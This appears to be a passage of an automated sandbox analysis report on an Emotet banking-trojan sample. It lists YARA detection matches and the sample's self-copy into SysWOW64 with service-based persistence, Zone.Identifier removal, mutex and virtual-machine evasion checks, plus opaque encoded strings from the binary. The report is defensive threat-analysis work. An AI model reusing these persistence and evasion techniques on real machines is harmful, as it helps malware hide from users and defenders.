            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E328C13_2_00E328C1
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E537A53_2_00E537A5
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E537A93_2_00E537A9
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E52F823_2_00E52F82
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: String function: 004128A0 appears 334 times
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: String function: 00412BA4 appears 128 times
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: String function: 00416254 appears 50 times
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: String function: 00424E33 appears 62 times
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: String function: 00414843 appears 52 times
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: String function: 0042D179 appears 50 times
            Source: lK8vF3n2e7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: lK8vF3n2e7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: lK8vF3n2e7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: lK8vF3n2e7.exe, 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMSADODLG.EXE vs lK8vF3n2e7.exe
            Source: lK8vF3n2e7.exe, 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMSADODLG.EXE vs lK8vF3n2e7.exe
            Source: lK8vF3n2e7.exe, 00000002.00000002.235071054.0000000003110000.00000002.00000001.sdmpBinary or memory string: originalfilename vs lK8vF3n2e7.exe
            Source: lK8vF3n2e7.exe, 00000002.00000002.235071054.0000000003110000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs lK8vF3n2e7.exe
            Source: lK8vF3n2e7.exe, 00000002.00000002.234823605.0000000003010000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs lK8vF3n2e7.exe
            Source: lK8vF3n2e7.exeBinary or memory string: OriginalFilenameMSADODLG.EXE vs lK8vF3n2e7.exe
            Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
            Source: lK8vF3n2e7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000004.00000002.456134629.0000000000721000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000000.00000002.194269122.0000000000570000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 4.2.corsangle.exe.70053f.1.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 4.2.corsangle.exe.70053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 3.2.corsangle.exe.e3053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 3.2.corsangle.exe.e3053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 3.2.corsangle.exe.e3053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 3.2.corsangle.exe.e3053f.1.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 3.2.corsangle.exe.e3053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 4.2.corsangle.exe.70053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 4.2.corsangle.exe.70053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 4.2.corsangle.exe.70053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 2.2.lK8vF3n2e7.exe.21e053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Emotet_Jan20_1 date = 2020-01-29, hash1 = e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d, author = Florian Roth, description = Detects Emotet malware, reference = https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
            Source: 0.2.lK8vF3n2e7.exe.57053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Trojan_Emotet tc_detection_name = Emotet, author = ReversingLabs, tc_detection_factor = , tc_detection_type = Trojan
            Source: classification engineClassification label: mal96.bank.troj.evad.winEXE@20/10@0/8
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,2_2_0222E138
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_02221943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_02221943
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_004070AE CoCreateInstance,OleRun,CoCreateInstance,0_2_004070AE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00428065 FindResourceA,LoadResource,LockResource,FreeResource,0_2_00428065
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0222E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,2_2_0222E138
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3892:120:WilError_01
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I8B93DEAF
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M8B93DEAF
            Source: lK8vF3n2e7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: lK8vF3n2e7.exeVirustotal: Detection: 71%
            Source: lK8vF3n2e7.exeReversingLabs: Detection: 90%
            Source: lK8vF3n2e7.exeString found in binary or memory: E4aXdlyDax6W5yGUiK+zzQuWwVX3LQqecci4Bees2GBp2ZfSbW1N/xyzbDoL5kOQMKqS6lAS2/WhX9uuPN5/wbyYciuvEhs8ykVZDbTGjBH91qRxKvGQ5GYH3N9xEy/V2mEBZ62Z02jtwgYTBKhCC0h0lehcWwrv9Qjn2XVFR5GMc/+duWl4uL7VE3z/4aSrX3sdAXeY75/vn7/r/aDDHEJfkkMt1sZprUyeoJcSBqisgyi6dXzPHz5Ec9N7ohNSzkTK
            Source: lK8vF3n2e7.exeString found in binary or memory: E4aXdlyDax6W5yGUiK+zzQuWwVX3LQqecci4Bees2GBp2ZfSbW1N/xyzbDoL5kOQMKqS6lAS2/WhX9uuPN5/wbyYciuvEhs8ykVZDbTGjBH91qRxKvGQ5GYH3N9xEy/V2mEBZ62Z02jtwgYTBKhCC0h0lehcWwrv9Qjn2XVFR5GMc/+duWl4uL7VE3z/4aSrX3sdAXeY75/vn7/r/aDDHEJfkkMt1sZprUyeoJcSBqisgyi6dXzPHz5Ec9N7ohNSzkTK
            Source: lK8vF3n2e7.exeString found in binary or memory: E4aXdlyDax6W5yGUiK+zzQuWwVX3LQqecci4Bees2GBp2ZfSbW1N/xyzbDoL5kOQMKqS6lAS2/WhX9uuPN5/wbyYciuvEhs8ykVZDbTGjBH91qRxKvGQ5GYH3N9xEy/V2mEBZ62Z02jtwgYTBKhCC0h0lehcWwrv9Qjn2XVFR5GMc/+duWl4uL7VE3z/4aSrX3sdAXeY75/vn7/r/aDDHEJfkkMt1sZprUyeoJcSBqisgyi6dXzPHz5Ec9N7ohNSzkTKnmBqmvDkrvxT506X5bGiBGtkKG/80QKfhVuyj235bs5QG82arNmrJN2+bTrIZNQFZ4pgH9uSw8lfE1EsR0jsqJMMaUAUxowX2vu/xeUcgZ/tiKhhnIuBJSLGWh7GX1sDqvI9FQtvWVieRJqXOdS5iTebfqmw43C+6BXr9HXvmLJeEujPfwgE1mxWk35QY+DPdkJj13tvAdBVg4yNE5wZzz9OW53s9AShzyrpPeUSGIWuRvOw
            Source: C:\Windows\SysWOW64\corsangle.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_3-4595
            Source: unknownProcess created: C:\Users\user\Desktop\lK8vF3n2e7.exe 'C:\Users\user\Desktop\lK8vF3n2e7.exe'
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeProcess created: C:\Users\user\Desktop\lK8vF3n2e7.exe --b0af2bca
            Source: unknownProcess created: C:\Windows\SysWOW64\corsangle.exe C:\Windows\SysWOW64\corsangle.exe
            Source: C:\Windows\SysWOW64\corsangle.exeProcess created: C:\Windows\SysWOW64\corsangle.exe --2e5419fc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
            Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeProcess created: C:\Users\user\Desktop\lK8vF3n2e7.exe --b0af2bcaJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess created: C:\Windows\SysWOW64\corsangle.exe --2e5419fcJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00401784 LoadLibraryW,GetProcAddress,0_2_00401784
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00412260 push eax; ret 0_2_00412274
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00412260 push eax; ret 0_2_0041229C
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_004128A0 push eax; ret 0_2_004128BE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00412BDF push ecx; ret 0_2_00412BEF
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00412260 push eax; ret 2_2_00412274
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00412260 push eax; ret 2_2_0041229C
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_004128A0 push eax; ret 2_2_004128BE
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_00412BDF push ecx; ret 2_2_00412BEF
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFAD3 push edx; iretd 2_2_021EFAD4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFAF1 push edx; retf 2_2_021EFAF8
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFB1A push edx; retf 2_2_021EFB48
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFB0F push edx; retf 2_2_021EFB10
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFB77 push edx; iretd 2_2_021EFB84
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFD52 push edx; iretd 2_2_021EFD70
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_021EFD71 push edx; retf 2_2_021EFD80
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FAF1 push edx; retf 3_2_00E3FAF8
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FAD3 push edx; iretd 3_2_00E3FAD4
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FD71 push edx; retf 3_2_00E3FD80
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FB77 push edx; iretd 3_2_00E3FB84
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FD52 push edx; iretd 3_2_00E3FD70
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FB0F push edx; retf 3_2_00E3FB10
            Source: C:\Windows\SysWOW64\corsangle.exeCode function: 3_2_00E3FB1A push edx; retf 3_2_00E3FB48

            Persistence and Installation Behavior:

            barindex
            Drops executables to the windows directory (C:\Windows) and starts themShow sources
            Source: C:\Windows\SysWOW64\corsangle.exeExecutable created and started: C:\Windows\SysWOW64\corsangle.exeJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exePE file moved: C:\Windows\SysWOW64\corsangle.exeJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0222E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,2_2_0222E138

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeFile opened: C:\Windows\SysWOW64\corsangle.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_0040921B IsIconic,GetWindowPlacement,GetWindowRect,0_2_0040921B
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_0040658E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_0040658E
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0040921B IsIconic,GetWindowPlacement,GetWindowRect,2_2_0040921B
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_0040658E IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_0040658E
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\corsangle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Found evasive API chain (may stop execution after checking mutex)Show sources
            Source: C:\Windows\SysWOW64\corsangle.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-4688
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-32081
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,2_2_0222DE9C
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeAPI coverage: 3.7 %
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeAPI coverage: 7.3 %
            Source: C:\Windows\SysWOW64\corsangle.exeAPI coverage: 9.2 %
            Source: C:\Windows\System32\svchost.exe TID: 5628Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_004290C4 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_004290C4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 2_2_004290C4 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_004290C4
            Source: C:\Users\user\Desktop\lK8vF3n2e7.exeCode function: 0_2_00412ABE VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_00412ABE
            Source: corsangle.exe, 00000004.00000002.456309381.00000000007B9000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8
            Source: lK8vF3n2e7.exeBinary or memory string: I8oKGytdP622n9WmGxbgmPhIfDzm3srNwnaDwLHaPuaIqKpKHJ+haXU4Lc/uxCygu3VYhfJXxbxfrqdeVt4kZAyaSSnVvXW0zfVXghGFS0LXjfmFDY7skNksCX66umEr8XOIxu8DVf/SLy0Y+CoBz14kYiA8CK3s/p/RPI/LVlsM47LNREhppES52ibX8zLNfqvGlsGDuvFvpXwN8FkJRxlJhksfuNqWAaun7Qgh0yyvLtn88xpWIzGLITTamiabjmuLwCMRlqY3XA6SgfZ+uca8a/1MdG0lStphN7lGEhfdKLw/e9YivSGh6sdeo5SNqldYl1zYJva6AvF4jcl6YVFubX4iG3pw7nmSwBe/JK9ZicF9v/BX4AYVJbXCbvpRLpbRqHbXINRefB8RH38YwI+uF8Hz/1vFqg6WrFLQA6ZcFqcDzVJQNgnvH6neKppl4IUwk2dBE9rkVxl0vZ5z94kZ9xBxad1rnEgLwjyH8T1CJUHTiH4g
            Source: svchost.exe, 00000001.00000002.196850072.0000029294540000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.262909344.000001B354940000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.288780129.00000244C3AC0000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.458125183.000001B859D90000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: corsangle.exe, 00000004.00000003.237988000.00000000012BC000.00000004.00000001.sdmpBinary or memory string: IMFjW6I6tWuQs0GEkwYUvArgbqKadyGhMtLKRP17z2E2SeGKH+5funxtr4DQXTMjNmbQ8G+be6VAA52gkNCwDVS7RqTPF5/AdHrXxnJVBGRZuMzC4r6+tiE3LHY2ILkWazR3xJqrBgeTKqf0pVK+OwzXM26MCMJsja+Yfduu6TCypj0tfHkn7c92hyUEdQpWAHNIiugOsYdKDztsa9pg9JUf/cneguWpnWryjDJpQdXggukiVSgK38QDmf+FnLvgoO3iT3UPGadCYvOyy2LEGDtE8qrNhlyQLxFI8sSD1sl7Y+qxvcDPc9gYUpfs6Zz/dO7l1WkPo8dmaHK2vglAR/DfZzM95esEmvlI6onL3XTg5/GU5HDGiWeGdKXEm1WfQ1y/1FE5zFVJnLXZ2/kYEQXsHBRpyzKWOVi9Rr3LAKYTqUF2CcKp1xa86o7EhnKkhnluMX+TT17XNSIVSD5nt+nSUVW8qv48vH6CajzqTwMFiDVJVvhZNOtWNaCJXsqr3FEdCvAMgEb6dJZiyYrKwAfVe5+LOjhyLveg//krqG1NP4wkQw/oRxad1ygfqhJ8pvdLwZShC7/Gv0SXegoWOJWLlXY+R4kTHY1FkvKIMCk1mUha7Sn8+Gni2hGWIACl5PH5m6KIO1dGiP3Z5ncSzg8Wzh1XRkrX2jgzrFNUU1JeziR2tOU38vNfgjX9YPZwUtKhsdUfEy8kdFseUjqxPLi3skzjm/42Lejc/C+qERQfsxaM6i2XrTZQW9HpWf56/I69Oi8XpuvuuyN1FfKEyjxgPgeL6S0FKcIhWtqxe/liDdw2qY6cMbfLxxaUAPNLeAwPBPBsq6ybunsXkgf2gIyKacXMw8QwQFZTvp59JXeBC+bxbbCvNrMT8G1yRpNbTBc0wFLV19HQJH74m6+CNOAEj76DPGEIil8YQ7D2ZsUn2Mx3VbfeiW2kFLwgQ1bkef/4z3liv/vzkz4MtOM8V5pVMk7kgiDoyTZi6dryeiF1CG2GfQlWPZJvaXpyh76Ey6haX+69ZAwzN+dHAQZuFyA60de+an5c/Y4PBmiNHrOfU3F0b/N4ztM5LHtgdqDp06yP+bcaC2S4no0ZFw1Y5bCTSvW7OEQhAOyiZcJJNZ9B+fWBpf00FShLQkPZ5T7DkbMD9Te2yYmJdp6CTQIDKEV/7gqGP4etQTRFZR/PR0k6eMNObpa+jq6BphfGmlM/TPc90OKXxSmD0jZAiM9lNQ/Che8PXZaHzJSINRnXGeA2XK1BjzRCf4xxqgfTWH3umZGpcvK6RJqDV11Q/SbIzkyCFfkA8qxD8CE4+sM9jQZ+81jKXXr5SxOKG0Rz/9pWYwWpaXbiIUYd7YMSPNZmOZNmM71DRlh51ivw9nikHLuZqbk8hNvdgjM5XQ/zYC+dQljkQ22BeUtKh5owEv2SI6s0fq+mg+ix9OJi4VZ8nBsk8fGqAhOZKar5OY/qn4lLmEfHuTV6KDbGSP0nIlbT50gxM33IYVPSfOpByeWLohz8VYgU7U7hCPQRLmu5WN1qmBuIrlhJQWqCc/WpsSg36fJ7nsA1V08+bovCiUCY1rk8UkCb3gvZDwZS4mth8W20aWKL8bINQAVHFGMYyOL1FoQK5RCUZsFsYbKJwD8wlEfJDT3m0KRLCjM0Za5RE8Nob9jRy2AV6eCFEGADc47DlSDCWilQGUIZdzfgloZ6q51KY4qorDg3ygbyP+6VdE6FNcuR+NcVI4BSdcVbhdorjsK6XPjuBXqqs7FFAsfbEpHb/yb9G12XmVcx50yhf1+UVvpIoTBkBbfB8WoRW6Jau7j6eESGMKJbfw3nZkQws4Pl5+OpDWmtI4SjwKUNpGxBshvOuJ/hxAzN4/ivT5wyi/5BBhWD7W+xRMJJnf3NAazWNSgzbVqQGWFN11N2E8dkOwkFp54TxWO7njC3J78kJlF7eaxZRMgMM3T8Wyu4vcPBQxE3/eDVoV